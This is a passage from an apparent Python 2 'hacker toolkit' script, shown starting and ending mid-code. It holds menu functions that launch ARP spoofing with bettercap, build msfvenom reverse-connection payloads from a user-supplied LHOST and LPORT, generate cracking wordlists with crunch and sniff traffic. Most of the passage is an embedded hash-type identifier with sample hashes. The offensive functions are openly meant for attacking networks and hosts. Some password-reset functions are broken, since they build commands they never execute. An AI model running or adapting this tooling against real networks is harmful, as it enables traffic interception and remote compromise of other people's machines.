os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and 